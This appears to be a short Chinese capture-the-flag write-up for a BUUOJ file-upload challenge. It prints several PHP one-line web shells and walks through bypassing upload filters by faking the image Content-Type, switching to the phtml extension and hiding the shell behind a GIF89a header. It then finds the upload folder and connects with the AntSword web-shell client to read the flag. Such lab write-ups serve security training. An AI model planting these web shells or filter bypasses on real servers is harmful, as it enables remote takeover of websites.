打开题目:
应该是一道文件上传的题目
试试上传
<?php eval($_POST['b'])?>
<?php $_GET['a']($_POST['b'])?>
显示:
提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg
显示过滤了php格式
常见绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht
把文件后缀名改成phtml试试
显示不能包含<?
换一个一句话木马
GIF89a? <script language="php">eval($_REQUEST[1])</script>
上传成功
现在需要知道图片的保存路径了。
一般都是upload/filename
访问一下
http://3e9f7dce-9612-4587-adac-60886ef0fb93.node4.buuoj.cn:81/upload/
发现了自己上传的文件
用蚁剑连接
直接进入根目录,找到flag
